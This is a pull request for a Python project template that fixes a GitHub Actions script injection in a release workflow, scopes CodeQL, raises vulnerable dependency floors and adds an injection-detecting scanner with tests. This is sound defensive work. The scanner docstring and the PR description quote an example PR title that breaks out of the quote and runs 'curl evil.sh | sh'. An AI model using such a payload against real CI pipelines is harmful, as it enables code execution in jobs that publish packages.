### PR TITLE
fix(security): stop a PR title reaching the release shell as code

### DIFF
--- a/.github/codeql/codeql-config.yml
+++ b/.github/codeql/codeql-config.yml
@@ -1,0 +1,23 @@
+# CodeQL scans the template, not the harness that exercises it.
+#
+# Without this file, `init` runs the default query suite over the whole checkout. The
+# security queries then read test assertions as if they were production code paths, and
+# report on them: `py/incomplete-url-substring-sanitization` fired five times on lines
+# like `assert "docs.python.org" in str(i)`, which assert that generated config content
+# is present rather than making any trust decision about a URL.
+#
+# Every such alert is a false positive, and dismissing them one by one does not hold:
+# the shape recurs every time a test asserts on a URL, and this repository's tests assert
+# on generated URLs constantly. Excluding the directory is the fix that stays fixed.
+#
+# The cost is real and deliberate: CodeQL no longer analyses test code. It has no
+# untrusted input and is already covered by ruff's flake8-bandit (`S`) ruleset, which
+# runs over the whole repository on every change. `docs_build/`, `noxfile.py` and the
+# template sources stay in scope.
+#
+# The generated projects get the equivalent file from
+# `template/.github/{% if include_actions and repo_visibility == 'public' %}codeql{% endif %}/`.
+name: "python-package-copier (source only)"
+
+paths-ignore:
+  - tests

--- a/.github/workflows/codeql.yml
+++ b/.github/workflows/codeql.yml
@@ -28,6 +28,10 @@ jobs:
         uses: github/codeql-action/init@v3
         with:
           languages: python
+          # Scopes the scan to shipped code. Without it the default suite reads test
+          # assertions as production code paths; see the config file for which queries
+          # that trips and why excluding beats dismissing.
+          config-file: ./.github/codeql/codeql-config.yml
 
       - name: Perform CodeQL analysis
         uses: github/codeql-action/analyze@v3

--- a/.github/workflows/publish-release.yml
+++ b/.github/workflows/publish-release.yml
@@ -26,10 +26,15 @@ jobs:
 
       - name: Find release tag
         id: find_tag
+        # The PR title reaches the shell through the environment, never through
+        # `${{ }}` inside `run:`. An expression is substituted into the script
+        # before bash parses it, so a title carrying shell metacharacters would
+        # execute here -- in a job that goes on to publish. An env var is data.
+        env:
+          PR_TITLE: ${{ github.event.pull_request.title }}
         run: |
           # Extract version from PR title (e.g., "chore(release): update CHANGELOG.md for v0.2.0")
-          PR_TITLE="${{ github.event.pull_request.title }}"
-          VERSION=$(echo "$PR_TITLE" | grep -oP 'v[0-9]+\.[0-9]+\.[0-9]+' || echo "")
+          VERSION=$(printf '%s' "$PR_TITLE" | grep -oP 'v[0-9]+\.[0-9]+\.[0-9]+' || echo "")
 
           if [ -z "$VERSION" ]; then
             echo "No version found in PR title"

--- a/docs/pages/explanation/security.md
+++ b/docs/pages/explanation/security.md
@@ -47,6 +47,14 @@ the jobs that must write are granted more.
 **A single merge gate.** No change lands until the full test suite and the security checks
 above all pass, enforced as one required status check.
 
+**Untrusted input never becomes code.** Values an outsider controls -- a pull request
+title, an issue body, a fork's branch name -- reach a workflow's shell only as environment
+variables. Workflow expressions are substituted into a script *before* the shell parses
+it, so interpolating one directly turns a crafted pull request title into commands that
+run with the release job's privileges. Quoting does not help; passing the value through
+`env:` does, because the runner then hands it over as data. A test asserts this over both
+the generated workflows and the ones this repository runs.
+
 **Scoped automation identity.** Release automation uses a short-lived, narrowly-scoped
 GitHub App token rather than a broad personal access token.
 

--- a/template/.claude/skills/update-from-template/references/file-classification.md
+++ b/template/.claude/skills/update-from-template/references/file-classification.md
@@ -99,6 +99,9 @@ docs/pages/explanation/security.md
 .github/workflows/commit-message.yml   # conditional: include_actions
 .github/workflows/codeql.yml       # conditional: include_actions + public repo_visibility
 .github/workflows/scorecard.yml    # conditional: include_actions + public repo_visibility
+.github/codeql/codeql-config.yml   # conditional: include_actions + public repo_visibility.
+                                   # Scopes the CodeQL scan; a project may add its own
+                                   # exclusions, so merge rather than overwrite.
 CODEOWNERS
 ```
 

--- a/template/.github/skills/update-from-template/references/file-classification.md
+++ b/template/.github/skills/update-from-template/references/file-classification.md
@@ -99,6 +99,9 @@ docs/pages/explanation/security.md
 .github/workflows/commit-message.yml   # conditional: include_actions
 .github/workflows/codeql.yml       # conditional: include_actions + public repo_visibility
 .github/workflows/scorecard.yml    # conditional: include_actions + public repo_visibility
+.github/codeql/codeql-config.yml   # conditional: include_actions + public repo_visibility.
+                                   # Scopes the CodeQL scan; a project may add its own
+                                   # exclusions, so merge rather than overwrite.
 CODEOWNERS
 ```
 

--- a/template/.github/{% if include_actions %}workflows{% endif %}/publish-release.yml.jinja
+++ b/template/.github/{% if include_actions %}workflows{% endif %}/publish-release.yml.jinja
@@ -28,10 +28,15 @@ jobs:
     steps:
       - name: Find release tag
         id: find_tag
+        # The PR title reaches the shell through the environment, never through
+        # an expression inside `run:`. An expression is substituted into the
+        # script before bash parses it, so a title carrying shell metacharacters
+        # would execute here -- in a job that goes on to publish. An env var is data.
+        env:
+          PR_TITLE: {% raw %}${{ github.event.pull_request.title }}{% endraw %}
         run: |
           # Extract version from PR title (e.g., "chore(release): update CHANGELOG.md for v0.2.0" or "v0.1.0-alpha.1")
-          PR_TITLE="{% raw %}${{ github.event.pull_request.title }}{% endraw %}"
-          VERSION=$(echo "$PR_TITLE" | grep -oP 'v[0-9]+\.[0-9]+\.[0-9]+(-[a-zA-Z0-9]+(\.[0-9]+)?)?' || echo "")
+          VERSION=$(printf '%s' "$PR_TITLE" | grep -oP 'v[0-9]+\.[0-9]+\.[0-9]+(-[a-zA-Z0-9]+(\.[0-9]+)?)?' || echo "")
 
           if [ -z "$VERSION" ]; then
             echo "No version found in PR title"

--- a/template/.github/{% if include_actions %}workflows{% endif %}/{% if repo_visibility == 'public' %}codeql.yml{% endif %}.jinja
+++ b/template/.github/{% if include_actions %}workflows{% endif %}/{% if repo_visibility == 'public' %}codeql.yml{% endif %}.jinja
@@ -28,6 +28,10 @@ jobs:
         uses: github/codeql-action/init@v3
         with:
           languages: python
+          # Scopes the scan to shipped code. Without it the default suite reads test
+          # assertions and example notebooks as production code paths; see the config
+          # file for which queries that trips and why excluding beats dismissing.
+          config-file: ./.github/codeql/codeql-config.yml
 
       - name: Perform CodeQL analysis
         uses: github/codeql-action/analyze@v3

--- a/template/.github/{% if include_actions and repo_visibility == 'public' %}codeql{% endif %}/codeql-config.yml.jinja
+++ b/template/.github/{% if include_actions and repo_visibility == 'public' %}codeql{% endif %}/codeql-config.yml.jinja
@@ -1,0 +1,26 @@
+# CodeQL scans the package, not the harness that exercises it.
+#
+# Without this file, `init` runs the default query suite over the whole checkout. The
+# security queries then read test assertions and example notebooks as if they were
+# production code paths, and report on them: `py/incomplete-url-substring-sanitization`
+# fires on `assert "docs.python.org" in url` (an assertion that config content is
+# present, not a trust decision), and `py/clear-text-logging-sensitive-data` fires on any
+# variable whose name contains "secret" or "trusted" -- including an allowlist of public
+# package names printed by an example.
+#
+# Every such alert is a false positive, and dismissing them one by one does not hold:
+# the shapes recur every time a test asserts on a URL. Excluding the directories is the
+# fix that stays fixed.
+#
+# The cost is real and deliberate: CodeQL no longer analyses test or example code. That
+# code does not run in production, has no untrusted input, and is already covered by
+# ruff's flake8-bandit (`S`) ruleset, which runs over the whole repository on every
+# change. `src/` and `docs_build/` -- the code that ships and the code that builds the
+# site -- stay in scope.
+name: "{{ package_name }} (source only)"
+
+paths-ignore:
+  - tests
+{%- if include_examples %}
+  - examples
+{%- endif %}

--- a/template/docs/pages/explanation/security.md.jinja
+++ b/template/docs/pages/explanation/security.md.jinja
@@ -54,6 +54,14 @@ rewrite the repository.
 **A single merge gate.** No change lands on the main branch until the full test suite and
 the security checks above all pass, enforced as one required status check.
 
+**Untrusted input never becomes code.** Values an outsider controls -- a pull request
+title, an issue body, a fork's branch name -- reach a workflow's shell only as environment
+variables. Workflow expressions are substituted into a script *before* the shell parses
+it, so interpolating one directly turns a crafted pull request title into commands that
+run with the release job's privileges. Quoting does not help; passing the value through
+`env:` does, because the runner then hands it over as data. A test asserts no workflow
+interpolates such a value into a `run:` or `script:` body.
+
 **Scoped automation identity.** Release automation authenticates with a short-lived,
 narrowly-scoped GitHub App token rather than a broad personal access token, so there is no
 long-lived automation credential to leak.

--- a/template/pyproject.toml.jinja
+++ b/template/pyproject.toml.jinja
@@ -85,12 +85,18 @@ docs = [
     # package. `mkdocs`/`mkdocs-material` above are kept so CI can still run a
     # MkDocs build as a comparison during the engine transition.
     "zensical>=0.0.51",
-    # Floor matches Zensical's own requirement (pymdown-extensions>=10.21.3).
-    # Do NOT pin to >=11: the examples group's notebook runtime caps
-    # pymdown-extensions at <11, so a project with examples must resolve it in
-    # [10.21.3, 11). Zensical works with either major; forcing 11 makes the
-    # docs-plus-examples sync unsatisfiable.
-    "pymdown-extensions>=10.21.3",
+    # Floor is a security floor: 10.x carries a path traversal in the b64 extension
+    # (GHSA-9xwg-3r6f-jcx2, fixed in 11.0.0) and 11.0.0 carries a ReDoS in four inline
+    # processors (GHSA-gm37-52c6-37mw, fixed in 11.0.1). Zensical works with either
+    # major, so nothing here argues for staying on 10.
+    #
+    # This floor used to read >=10.21.3 with a comment forbidding >=11, because the
+    # examples group's notebook runtime capped it at <11 and a project with examples
+    # could not resolve otherwise. That is what let a known-vulnerable version sit in
+    # five repositories: the cap was real, the CVEs landed behind it, and nothing
+    # rechecked the cap afterwards. That runtime has since relaxed its cap, and the
+    # examples group floors at the first release that did -- the two must move together.
+    "pymdown-extensions>=11.0.1",
     # Also a direct import of docs_build/_api_pages.py, which reads mkdocstrings'
     # `preload_modules` out of mkdocs.yml so that list has one definition rather
     # than two. Same argument as griffe above: it arrives via mkdocs anyway, but
@@ -111,7 +117,11 @@ fix = [
   "prek>=0.4.10",
 ]
 {% if include_examples %}examples = [
-    "marimo>=0.19.0",
+    # Floor is set by the docs group, not by anything marimo does. marimo caps
+    # pymdown-extensions, and every release before 0.23.16 capped it at <11 -- below
+    # the version that fixes two published advisories. Lowering this floor puts those
+    # CVEs back in the lockfile of every project that generates examples.
+    "marimo>=0.23.16",
 ]{% endif %}
 
 [project.urls]

--- a/tests/_workflow_expressions.py
+++ b/tests/_workflow_expressions.py
@@ -1,0 +1,87 @@
+"""Find GitHub Actions expressions that reach a shell as code rather than as data.
+
+`${{ }}` is not a shell variable. Actions substitutes it into the script body *before*
+bash ever sees the text, so an expression holding attacker-controlled characters is
+spliced into the command line and runs. `PR_TITLE="${{ github.event.pull_request.title }}"`
+looks quoted and is not: a title of `"; curl evil.sh | sh; #` closes the quote and the
+rest executes.
+
+That exact line shipped in `publish-release.yml` to this repo and all seven generated
+projects, in the job that holds `contents: write` and gates PyPI publication. OpenSSF
+Scorecard flagged it as critical in eight repositories at once. Nothing in the test suite
+looked at expression *placement*, only at pins and permissions, so the shape was free to
+be copied forward on every release.
+
+The safe form passes the value through `env:`, where the runner sets it as a real
+environment variable and the shell reads it as data:
+
+    env:
+      PR_TITLE: ${{ github.event.pull_request.title }}
+    run: |
+      printf '%s' "$PR_TITLE" | grep -oP '...'
+
+Text-based rather than YAML-based: the template's sources are `.jinja` files that a YAML
+parser cannot load, and the same rule has to hold on both sides of the template boundary.
+"""
+
+import re
+
+# Everything under `github.event` is written by whoever opened the pull request, issue,
+# comment or discussion, and `github.head_ref` is a branch name on their own fork. There
+# is no sub-field worth carving an exception for: `pull_request.number` is safe today,
+# but an allowlist is a second thing to maintain and the `env:` form costs two lines.
+UNTRUSTED = re.compile(r"\$\{\{\s*(?P<expr>github\.event[\w.*\[\]'\"-]*|github\.head_ref)\s*\}\}")
+
+# `run:` and `script:` are the two keys whose value is executed. `script:` belongs to
+# actions/github-script, where the value is JavaScript rather than shell, but the
+# substitution happens the same way and a template literal breaks out the same way.
+_SHELL_KEY = re.compile(r"^(?P<indent>\s*)(?:-\s+)?(?P<key>run|script):\s*(?P<inline>.*)$")
+
+
+def _shell_lines(text):
+    """Yield ``(line_number, line)`` for every line executed as a script body.
+
+    Handles both the inline form (``run: echo hi``) and the block-scalar form
+    (``run: |`` followed by an indented body), because the injection reads identically
+    in either and a check that saw only one of them would pass over the other.
+    """
+    lines = text.splitlines()
+    i = 0
+    while i < len(lines):
+        match = _SHELL_KEY.match(lines[i])
+        if not match:
+            i += 1
+            continue
+
+        inline = match.group("inline").strip()
+        if inline and not inline.startswith(("|", ">")):
+            yield i + 1, lines[i]
+            i += 1
+            continue
+
+        # A block scalar runs until the indentation returns to the key's own level.
+        key_indent = len(match.group("indent"))
+        i += 1
+        while i < len(lines):
+            line = lines[i]
+            if line.strip() and len(line) - len(line.lstrip()) <= key_indent:
+                break
+            yield i + 1, line
+            i += 1
+
+
+def sites_in_text(text, name="<text>"):
+    """Untrusted expressions inside a script body, as ``(name, line, expression)``.
+
+    An empty list is the passing result. Callers must separately assert that the set of
+    files scanned is non-empty -- this returning nothing is equally consistent with "no
+    injections" and "nothing was read".
+    """
+    return [
+        (name, lineno, match.group("expr")) for lineno, line in _shell_lines(text) for match in UNTRUSTED.finditer(line)
+    ]
+
+
+def injection_sites(path):
+    """``sites_in_text`` over one workflow file, keyed by its filename."""
+    return sites_in_text(path.read_text(encoding="utf-8"), path.name)

--- a/tests/test_repo_workflows.py
+++ b/tests/test_repo_workflows.py
@@ -18,6 +18,7 @@ from pathlib import Path
 import yaml
 from _tool_invocations import find_invocations, unreadable_annotations
 from _tool_invocations import unpinned as unpinned_invocations
+from _workflow_expressions import injection_sites, sites_in_text
 
 _REPO = Path(__file__).resolve().parent.parent
 _WORKFLOWS = _REPO / ".github" / "workflows"
@@ -81,6 +82,82 @@ def test_the_assertion_reads_this_repository_not_generated_output():
     assert _WORKFLOWS.is_dir(), "this repository has no .github/workflows to check"
     assert _repo_workflow_paths(), "no workflows found; the pin assertions would pass over an empty set"
     assert _setup_uv_steps(), "no astral-sh/setup-uv steps found in this repository's workflows"
+
+
+def test_no_untrusted_expression_reaches_a_shell():
+    """No `${{ github.event.* }}` is substituted into a `run:` or `script:` body here.
+
+    The template's half of this pair lives in `test_security_hardening.py` and asserts it
+    over the generated project. This half asserts it over the workflows this repository
+    runs, because the two trees drift: the repo's own `publish-release.yml` carried the
+    injection in a different job layout than the template's, so a fix to the template
+    would not have reached it and a check reading only the template would have called
+    this repository clean.
+
+    Untrusted values belong in `env:`, where the runner sets them as environment
+    variables and the shell reads them as data. See `_workflow_expressions` for why the
+    quotes around an interpolation do not help.
+    """
+    sites = [site for path in _repo_workflow_paths() for site in injection_sites(path)]
+    assert not sites, "untrusted expressions substituted into a script body (move them to `env:`): " + ", ".join(
+        f"{name}:{line} {expr}" for name, line, expr in sites
+    )
+
+
+def test_this_repo_scopes_its_own_codeql_scan():
+    """This repository reads a CodeQL config too, and it exists.
+
+    The template's half is in `test_security_hardening.py`. This repository's `codeql.yml`
+    is not generated from the template, so a fix there would leave this one scanning its
+    own test suite -- which is where five of the seven CodeQL false positives were.
+    """
+    workflow = (_WORKFLOWS / "codeql.yml").read_text(encoding="utf-8")
+    assert "config-file: ./.github/codeql/codeql-config.yml" in workflow, (
+        "codeql.yml does not point at a config, so the default suite scans tests/"
+    )
+    config = _REPO / ".github" / "codeql" / "codeql-config.yml"
+    assert config.is_file(), "codeql.yml points at a config that does not exist; the workflow would fail"
+    assert "- tests" in config.read_text(encoding="utf-8")
+
+
+def test_the_injection_scanner_finds_what_it_is_meant_to_find():
+    """A clean result means the scanner looked, not that the walk fell off line one.
+
+    `injection_sites` returning nothing is equally consistent with "no injections" and
+    "the block-scalar walk read nothing". Both placements the vulnerable code actually
+    took are exercised here, plus the two forms that must NOT fail: the safe `env:`
+    handoff this repository now uses, and `if:` conditions, which are evaluated by
+    Actions rather than spliced into a shell.
+    """
+    caught = sites_in_text(
+        "jobs:\n"
+        "  build:\n"
+        "    steps:\n"
+        "      - run: |\n"
+        '          PR_TITLE="${{ github.event.pull_request.title }}"\n'
+        "      - run: echo ${{ github.head_ref }}\n"
+        "      - uses: actions/github-script@v9\n"
+        "        with:\n"
+        "          script: |\n"
+        "            core.info(`${{ github.event.issue.title }}`)\n"
+    )
+    assert [expr for _, _, expr in caught] == [
+        "github.event.pull_request.title",
+        "github.head_ref",
+        "github.event.issue.title",
+    ]
+
+    allowed = sites_in_text(
+        "jobs:\n"
+        "  build:\n"
+        "    if: github.event.pull_request.merged == true\n"
+        "    steps:\n"
+        "      - env:\n"
+        "          PR_TITLE: ${{ github.event.pull_request.title }}\n"
+        "        run: |\n"
+        "          printf '%s' \"$PR_TITLE\"\n"
+    )
+    assert allowed == []
 
 
 def test_every_repo_setup_uv_step_pins_an_exact_version():

--- a/tests/test_security_hardening.py
+++ b/tests/test_security_hardening.py
@@ -7,6 +7,8 @@ observably present (or absent) in the generated project, so a regression fails a
 rather than passing unnoticed.
 """
 
+from _workflow_expressions import injection_sites
+
 WORKFLOW_NAMES = [
     "tests.yml",
     "changelog.yml",
@@ -42,6 +44,50 @@ def test_codeql_and_scorecard_ship_for_public(copie):
     public = copie.copy(extra_answers={"repo_visibility": "public", "include_actions": True})
     assert (public.project_dir / ".github/workflows/codeql.yml").exists()
     assert (public.project_dir / ".github/workflows/scorecard.yml").exists()
+
+
+def test_codeql_analyses_source_and_not_the_test_harness(copie):
+    """CodeQL ships a config scoping the scan to shipped code, and the workflow reads it.
+
+    Presence of the file is not enough and neither is the `config-file` input alone: a
+    config that no `init` step points at is inert, and an input pointing at a path that
+    does not ship makes the whole workflow fail. Both ends are asserted, plus the actual
+    exclusions -- without them the default suite reads test assertions as production
+    code paths and reports false positives that recur faster than they can be dismissed.
+    """
+    result = copie.copy(extra_answers={"repo_visibility": "public", "include_actions": True, "include_examples": True})
+    config = result.project_dir / ".github/codeql/codeql-config.yml"
+    assert config.exists(), "no CodeQL config; the default suite would scan tests and examples"
+
+    workflow = _read(result.project_dir, ".github/workflows/codeql.yml")
+    assert "config-file: ./.github/codeql/codeql-config.yml" in workflow, (
+        "codeql.yml does not point at the config, so the config changes nothing"
+    )
+
+    ignored = config.read_text(encoding="utf-8")
+    assert "- tests" in ignored
+    assert "- examples" in ignored
+
+
+def test_codeql_config_is_absent_wherever_codeql_is(copie):
+    """No orphan config where no CodeQL workflow runs, and none for a project without examples.
+
+    A config for a workflow that does not ship is dead weight that later reads as a
+    control the project has. The examples exclusion is likewise conditional: listing a
+    directory the project does not generate would document a scope decision that was
+    never made.
+    """
+    private = copie.copy(
+        extra_answers={"repo_visibility": "private", "include_actions": True, "include_codecov": False}
+    )
+    assert not (private.project_dir / ".github/codeql").exists()
+
+    no_examples = copie.copy(
+        extra_answers={"repo_visibility": "public", "include_actions": True, "include_examples": False}
+    )
+    config = _read(no_examples.project_dir, ".github/codeql/codeql-config.yml")
+    assert "- tests" in config
+    assert "- examples" not in config
 
 
 def test_codeql_and_scorecard_absent_for_private(copie):
@@ -133,12 +179,83 @@ def test_changelog_uses_app_token_not_pat(copie):
     assert "CHANGELOG_AUTOMATION_TOKEN" not in changelog
 
 
+def test_no_untrusted_expression_reaches_a_shell(copie):
+    """No generated workflow substitutes `${{ github.event.* }}` into a script body.
+
+    An expression is spliced into the script before bash parses it, so a PR title
+    carrying shell metacharacters executes. `publish-release.yml` did exactly this, in
+    the job holding ``contents: write`` that gates publication, and shipped it to seven
+    projects; the value now passes through ``env:``, where the shell reads it as data.
+
+    Quantified over every generated workflow rather than the one that was broken, and
+    over the whole of each one rather than the release job, so the next workflow to
+    interpolate a PR body or an issue title fails here instead of on a Scorecard run.
+    """
+    result = copie.copy(extra_answers={"repo_visibility": "public", "include_actions": True})
+    workflows = sorted((result.project_dir / ".github" / "workflows").glob("*.yml"))
+    assert workflows, "no workflows generated; this assertion would pass over an empty set"
+
+    sites = [site for path in workflows for site in injection_sites(path)]
+    assert not sites, "untrusted expressions substituted into a script body (move them to `env:`): " + ", ".join(
+        f"{name}:{line} {expr}" for name, line, expr in sites
+    )
+
+
+def test_release_tag_is_parsed_from_the_environment(copie):
+    """The release job reads the PR title from `env:`, and never re-interpolates it.
+
+    The generic scan above would stay green if someone "fixed" this by adding an `env:`
+    block and leaving the `${{ }}` in the script, or by dropping the title parsing
+    entirely. This pins the specific shape the release path depends on.
+    """
+    result = copie.copy(extra_answers={"include_actions": True})
+    publish = _read(result.project_dir, ".github/workflows/publish-release.yml")
+
+    assert "PR_TITLE: ${{ github.event.pull_request.title }}" in publish, (
+        "the PR title no longer reaches the release job through the environment"
+    )
+    assert 'PR_TITLE="${{' not in publish, "the PR title is still interpolated into the shell"
+    assert '"$PR_TITLE"' in publish, "nothing reads the PR title, so the version can no longer be found"
+
+
 def test_publish_action_is_not_a_branch_ref(copie):
     """The PyPI publish action is pinned to a tag, not the mutable @release/v1 branch."""
     result = copie.copy(extra_answers={"include_actions": True})
     publish = _read(result.project_dir, ".github/workflows/publish-release.yml")
     assert "gh-action-pypi-publish@release/v1" not in publish
     assert "gh-action-pypi-publish@v" in publish
+
+
+def _floor(pyproject, package):
+    """The `>=` floor the generated pyproject declares for one package, as a tuple."""
+    spec = next(line.split('"')[1] for line in pyproject.splitlines() if line.strip().startswith(f'"{package}>='))
+    return tuple(int(part) for part in spec.split(">=", 1)[1].split("."))
+
+
+def test_docs_dependencies_clear_the_published_advisories(copie):
+    """pymdown-extensions floors above both advisories, and marimo floors high enough to allow it.
+
+    pymdown-extensions 10.x carries a path traversal (GHSA-9xwg-3r6f-jcx2, fixed in
+    11.0.0) and 11.0.0 a ReDoS (GHSA-gm37-52c6-37mw, fixed in 11.0.1). Both sat in five
+    generated repositories, unreachable, because the examples group's marimo capped
+    pymdown-extensions at <11 and nothing rechecked that cap after the advisories landed.
+
+    Asserted as a version comparison rather than a string match, so moving the floor
+    forward passes and moving it back fails. The two floors are checked together because
+    they are one decision: lowering the marimo floor silently reintroduces the CVEs by
+    making the pymdown floor unresolvable for any project with examples.
+    """
+    result = copie.copy(extra_answers={"include_examples": True})
+    pyproject = _read(result.project_dir, "pyproject.toml")
+
+    assert _floor(pyproject, "pymdown-extensions") >= (11, 0, 1), (
+        "pymdown-extensions floors below 11.0.1, which is vulnerable to GHSA-9xwg-3r6f-jcx2 "
+        "(path traversal) or GHSA-gm37-52c6-37mw (ReDoS)"
+    )
+    assert _floor(pyproject, "marimo") >= (0, 23, 16), (
+        "marimo floors below 0.23.16, whose pymdown-extensions<11 cap makes the security "
+        "floor above unresolvable for a project with examples"
+    )
 
 
 def test_security_posture_page_present_and_in_nav(copie):


### PR DESCRIPTION
Found by sweeping the org's Dependabot, malware and code scanning alerts across all eight repos. Headline counts were 3 Dependabot alerts, 0 malware, 101 code scanning alerts; two of the three were misleading, and the third held exactly one exploitable bug.

## The exploitable one

`publish-release.yml` interpolated `${{ github.event.pull_request.title }}` straight into a bash body:

```yaml
run: |
  PR_TITLE="${{ github.event.pull_request.title }}"
```

The quotes are not a boundary. Actions substitutes the expression *before* bash parses the script, so a merged PR titled ``v1.0.0"; curl evil.sh | sh; #`` runs those commands — in the job that holds `contents: write` and gates PyPI publication. Scorecard rated it critical in this repo and all seven it generates; it was the only dangerous-context interpolation in the fleet.

The title now arrives via `env:`. `printf` replaces `echo` so a title starting with `-` can't be read as a flag.

### The test is in two halves on purpose

This repo's own `publish-release.yml` had the same bug in a *different job layout*, so a template-only fix would have missed it. `tests/_workflow_expressions.py` scans `run:`/`script:` bodies for any `github.event.*` or `github.head_ref` expression — no allowlist of "safe" fields, since the `env:` form costs two lines. Run against the pre-fix tree it reports **exactly the eight sites Scorecard found**, and clean after.

## CodeQL was analysing the test suite

All seven open CodeQL alerts were false positives from unscoped analysis — five `py/incomplete-url-substring-sanitization` on assertions like `assert "docs.python.org" in str(i)`, which check generated config content is present rather than making a trust decision. One was `py/clear-text-logging-sensitive-data` firing on the substring **`trusted`** in `trusted_modules`, a public package allowlist.

Dismissing them doesn't hold — 11 more sites of the same shape already exist below the heuristic threshold. A config file scopes the scan to shipped code. Tests assert both ends: a config no `init` points at is inert, and an input pointing at a file that doesn't ship fails the whole run.

Cost, stated plainly: CodeQL no longer analyses test or example code. ruff's flake8-bandit `S` ruleset still covers the whole repo.

## pymdown-extensions was floored on two advisories

GHSA-9xwg-3r6f-jcx2 (path traversal) and GHSA-gm37-52c6-37mw (ReDoS), sitting in five generated repos. The floor was held down by the examples group's marimo, which capped pymdown below the fix — the cap was real, the advisories landed behind it, and nothing rechecked afterwards. marimo 0.23.16 lifted it to `<12`.

Both floors move together and the test reads them as versions, so moving either back fails. Verified end to end: a generated project with examples resolves pymdown 11.0.1 + marimo 0.23.16 and `nox -s build_docs` passes including the marimo export. The resolved marimo only moves 0.23.14 → 0.23.16 — it's the declared floor that jumps.

## Verification

- `just test-fast`: 432 passed
- `just fix`: clean
- scanner reproduces all 8 pre-fix Scorecard sites, 0 after
- generated project locks and builds docs with the new floors

Once this lands, cut a release and fan out — this is what closes the critical finding in the other seven repos.